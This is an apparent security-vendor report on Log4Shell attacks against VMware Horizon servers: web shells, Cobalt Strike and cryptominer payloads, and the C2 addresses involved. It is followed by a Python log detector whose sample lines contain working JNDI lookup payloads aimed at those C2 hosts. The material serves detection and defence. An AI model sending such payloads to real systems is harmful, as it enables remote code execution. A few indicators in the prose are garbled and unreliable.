In the wake of the December 2021 exposure of a remote code execution vulnerability (dubbed “Log4Shell”) in the ubiquitous Log4J Java logging library, we tracked widespread attempts to scan for and exploit the weakness, particularly among cryptocurrency mining bots. The vulnerability affected hundreds of software products, making it difficult for some organizations to assess their exposure. One of the products affected was VMware Horizon, a desktop and application virtualization platform that became part of the solution for some organizations’ work-from-home needs prior to and during office shutdowns over the past two years. In late December 2021 and in January 2022, there were multiple reports of active exploitation of the Log4Shell vulnerability in VMware Horizon servers.

The attack used the Lightweight Directory Access Protocol resource call of Log4J to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provided remote access and code execution to the attackers. SophosLabs has observed these attacks in customer telemetry since the beginning of January. The attempts to leverage Horizon, which continued and grew in number throughout January, were frequently associated with attempts to deploy cryptocurrency mining malware; others had less clear motives, and may be associated with initial access brokers or ransomware actors.

The initial attempts on January 10 came from command and control servers at apirogerscorporg (since sink-holed) and 4532.125.79. The next day, the server was changed to 185.112.83.116; this was kept in use for a larger wave of attacks on January 14. Some of these used Cobalt Strike to stage and execute the cryptominer payloads.

The largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing. This wave did not rely on Cobalt Strike; instead, the cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server. The most frequently used server in these campaigns is 80.71.158.96. The earlier attacks followed this pattern:

[Figure: Infection process VMware -> Tomcat -> Cobalt]
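As an added example that is not part of the Sophos article, the following detector scans Tomcat-style access log lines for the Log4J JNDI lookup string the text describes (LDAP and related schemes), decodes URL-encoded variants, and matches the callback host against the two command and control addresses the article names. The log format, request paths and client addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# C2 addresses named in the article; used here only as match indicators.
KNOWN_C2 = {"80.71.158.96", "185.112.83.116"}

# Combined access-log format (assumed; adjust to the Horizon/Tomcat logging pattern in use).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# A Log4J lookup that would make the logger contact an external JNDI resource.
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>ldaps?|rmi|dns):/*(?P<host>[^:/}\s]+)', re.IGNORECASE)


def decode(value: str) -> str:
    """Strip up to two layers of URL-encoding so encoded lookups are visible."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    # Request line, Referer and User-Agent all end up in logs the library formats.
    haystack = " ".join(decode(m.group(g)) for g in ("req", "ref", "ua"))
    hit = JNDI_RE.search(haystack)
    if not hit:
        return None
    host = hit.group("host")
    return {"src": m.group("ip"), "ts": m.group("ts"), "scheme": hit.group("scheme").lower(),
            "callback": host, "known_c2": host in KNOWN_C2}


def scan_log(lines):
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample lines: one benign, one lookup in User-Agent, one URL-encoded in the
# query string, one pointing at a host not on the article's list.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2022:10:15:02 +0000] "GET /portal/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2022:10:15:09 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${jndi:ldap://80.71.158.96:1389/a}"',
    '198.51.100.9 - - [14/Jan/2022:08:01:33 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F185.112.83.116%3A1389%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.2 - - [10/Jan/2022:07:00:00 +0000] "POST /portal/ HTTP/1.1" 200 10 "-" "${jndi:rmi://c2.example.invalid/x}"',
]
```

Run `scan_log(SAMPLE_LOG)` to get one finding per suspicious line; the `known_c2` flag separates hits on the article's infrastructure from lookups toward unlisted hosts that still warrant triage.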